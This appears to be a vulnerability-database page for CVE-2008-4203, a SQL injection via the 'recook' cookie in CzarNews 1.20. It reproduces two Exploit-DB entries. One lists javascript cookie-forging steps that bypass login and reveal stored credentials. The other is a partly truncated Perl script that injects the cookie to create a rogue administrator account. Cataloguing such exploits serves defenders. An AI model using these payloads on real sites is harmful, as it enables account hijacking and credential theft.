CVE-2008-4203
published 2008-09-24CVE-2008-4203: SQL injection vulnerability in cn_users.php in CzarNews 1.20 and earlier allows remote attackers to execute arbitrary SQL commands via a recook cookie.
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.01%
78.4th percentile
SQL injection vulnerability in cn_users.php in CzarNews 1.20 and earlier allows remote attackers to execute arbitrary SQL commands via a recook cookie.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| czaries | czarnews | <= 1.20 | — |
| czaries | czarnews | — | — |
| czaries | czarnews | — | — |
| czaries | czarnews | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CzarNews 1.20 - Account Hijacking SQL Injection
exploitdb·2008-09-15
CVE-2008-4203 CzarNews 1.20 - Account Hijacking SQL Injection
CzarNews 1.20 - Account Hijacking SQL Injection
---
czarNews Account Hijacking <= 1.20 user and password Leak
Author: Maycon Maia Vitali ( 0ut0fBound )
Contact: mayconmaia at yahoo dot com dot br
http://maycon.gsec.com.br
Original Xploit by StAkeR ( http://www.milw0rm.com/exploits/6462 )
Gerenal Xploit:
1) Go to some page with CzarNews 1.20. You are in the 'Login Page'
2) Put in the URL: javascript:document.cookie="recook=' or ''=',' or
''='";void(0);
3) Refresh the page. Now you are logged in.
4) Put in the URL:
javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a
lert("Login: " + p[0] + "\nPass: " + p[1]);void(0);
5) With this you getted the current user and password
Attacking Especific User:
If you have some user that you need Xploit, You can change the
Exploit-DB
CzarNews 1.20 - 'cookie' SQL Injection
exploitdb·2008-09-15
CVE-2008-4203 CzarNews 1.20 - 'cookie' SQL Injection
CzarNews 1.20 - 'cookie' SQL Injection
---
#!/usr/bin/perl
# ----------------------------------------------------------
# CzarNews agent("Mozilla/4.5 [en] (Win95; U)");
$http_s->timeout(1);
$http_s->default_header('Cookie' => "recook=' or '1=1,' or '1=1");
$request = $http_s->post($hostname."/cn_users.php",
[
user => $username,
pass => $password,
email => $email,
allcats => "all",
admin => "off",
news => "on",
images => "on",
users => "on",
categories => "on",
config => "on",
words => "on",
op => "add",
id => '',
go => "true",
submit => "Add+User"
]);
if($request->is_success)
{
if($request->content =~ /has been added/i)
{
print "[+] Added New Administrator: $username & $password\n";
}
else
{
print "[!] Exploit Failed!\n";
print "[!] Site Not Vulnerable\n";
}
}
sub banner
{
print "[+]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4306http://www.securityfocus.com/bid/31182https://exchange.xforce.ibmcloud.com/vulnerabilities/45127https://www.exploit-db.com/exploits/6462http://securityreason.com/securityalert/4306http://www.securityfocus.com/bid/31182https://exchange.xforce.ibmcloud.com/vulnerabilities/45127https://www.exploit-db.com/exploits/6462
2008-09-24
Published